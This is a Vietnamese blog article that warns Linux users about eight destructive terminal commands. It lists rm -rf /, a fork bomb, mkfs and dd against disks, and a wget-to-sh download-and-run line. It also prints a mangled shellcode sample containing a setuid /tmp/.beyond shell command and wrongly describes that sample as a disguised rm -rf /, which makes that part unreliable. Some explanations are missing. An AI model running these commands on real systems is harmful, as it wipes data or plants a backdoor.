8 lệnh chết người nhất định không bao giờ được chạy trên Linux

Lệnh Terminal trên Linux có sức công phá khá mạnh, nếu bạn chạy một lệnh nào sẽ phá hủy hệ thống của bạn. Linux không yêu cầu bạn phải xác nhận khi chạy bất kỳ một lệnh nào.


Việc tìm hiểu các lệnh không nên chạy trên Linux giúp bảo vệ hệ thống của bạn khi làm việc trên Linux. Dưới đây là 8 lệnh chết người nhất định bạn không bao giờ được chạy trên Linux.8 lệnh chết người nhất định không bao giờ được chạy trên Linux

1. rm -rf / - xóa tất cả mọi thứ


Lệnh rm -rf / sẽ xóa tất cả mọi thứ, kể cả các file trên ổ cứng và các file trên các thiết bị media kết nối với máy tính của bạn.


Để dễ hiểu hơn về câu lệnh này, bạn phân tích như sau:


Linux sẽ vui vẻ làm theo lệnh này và xóa mọi thứ mà không thông báo trước cho bạn, vì thế hãy cẩn thận khi sử dụng lệnh này.


Ngoài ra lệnh rm còn được sử dụng theo những cách rất nguy hiểm. Chẳng hạn, rm –rf ~ sẽ xóa mọi file trong Home Folder của bạn, còn rm -rf .* sẽ xóa tất cả các file cấu hình của bạn.


2. Lệnh trá hình rm –rf /


Dưới đây là một đoạn mã trên tất cả các Web:


char esp[] __attribute__ ((section('.text'))) /* e.s.p
release */
= 'xebx3ex5bx31xc0x50x54x5ax83xecx64x68'
'xffxffxffxffx68xdfxd0xdfxd9x68x8dx99'
'xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7'
'x56x04xf7x56x08xf7x56x0cx83xc4x74x56'
'x8dx73x08x56x53x54x59xb0x0bxcdx80x31'
'xc0x40xebxf9xe8xbdxffxffxffx2fx62x69'
'x6ex2fx73x68x00x2dx63x00'
'cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;';

Đây thực chất là một phiên bản khác của rm –rf / – thực thi lệnh này cũng sẽ xóa hết các file của bạn, như bạn chạy lệnh rm –rf /.


3. :(){ :|: & };: – Một dạng bom tấn
Dòng lệnh dưới đây nhìn có vẻ rất đơn giản nhưng thực chất chức năng của nó lại rất nguy hiểm:


:(){ :|: & };:

Dòng lệnh ngắn này sẽ tạo ra các bản sao mới của chính nó. Nghĩa là, quá trình sao lưu chính bản thân nó sẽ diễn ra liên tục và nhanh chóng khiến CPU và bộ nhớ của bạn bị đầy.


Ngoài ra nó có thể khiến máy tính của bạn bị đóng băng. Đó cơ bản là một vụ tấn công từ chối dịch vụ (DoS).


4. mkfs.ext4 /dev/sda1 – Formats ổ cứng


Lệnh mkfs.ext4 /dev/sda1 là câu lệnh khá dễ hiểu:


Khi kết hợp 2 lệnh này tương đương với format ổ C: trên Windows – xóa hết các file trên phân vùng đầu tiên của bạn và thay thế chúng bằng hệ thống file mới.


Lệnh này có thể xuất hiện ở nhiều định dạng khác nhau, như - mkfs.ext3 /dev/sdb2 sẽ format phân vùng thứ hai trên ổ cứng thứ 2 của bạn với hệ thống file ext3.


5. command > /dev/sda - viết trực tiếp lên một ổ cứng
Dòng command > /dev/sda - chạy một lệnh và gửi ra kết quả của lệnh đó trực tiếp lên ổ cứng đầu tiên của bạn, viết dữ liệu thẳng vào ổ cứng và phá hủy hệ thống file của bạn.


6. dd if=/dev/random of=/dev/sda – viết những dữ liệu ngớ ngẩn lên ổ cứng


Dòng dd if=/dev/random of=/dev/sda sẽ xóa dữ liệu trên một trong các ổ cứng của bạn.


7. mv ~ /dev/null – Di chuyển Home Directory của bạn đến một lỗ đen (Black Hole)


/dev/null - di chuyển cái gì đó đến /dev/null cũng tương tự như phá hủy nó. Hãy xem /dev/null là một lỗ đen. mv ~ /dev/null sẽ gửi hết tất cả các file cá nhân của bạn đến một lỗ đen.


8. wget http://example.com/something -O – | sh – tải và chạy một script


Dòng lệnh trên sẽ tải một script từ trên web và gửi script đến sh, và sẽ thực thi các nội dung trong script. Điều này có thể nguy hiểm nếu bạn không chắc script là gì hoặc bạn không có nguồn script tin cậy – không được chạy những script không đáng tin cậy.


wget – tải một file.


http://example.com/something – tải file từ vị trí này.


| – Dẫn (gửi) đầu ra của lệnh wget (file bản đã tải) trực tiếp đến một lệnh khác.


sh – gửi file đến lệnh sh.


Tham khảo thêm một số bài viết dưới đây:


Chúc các bạn vui vẻ! 

BÌNH LUẬN

BẠN ĐÃ XEM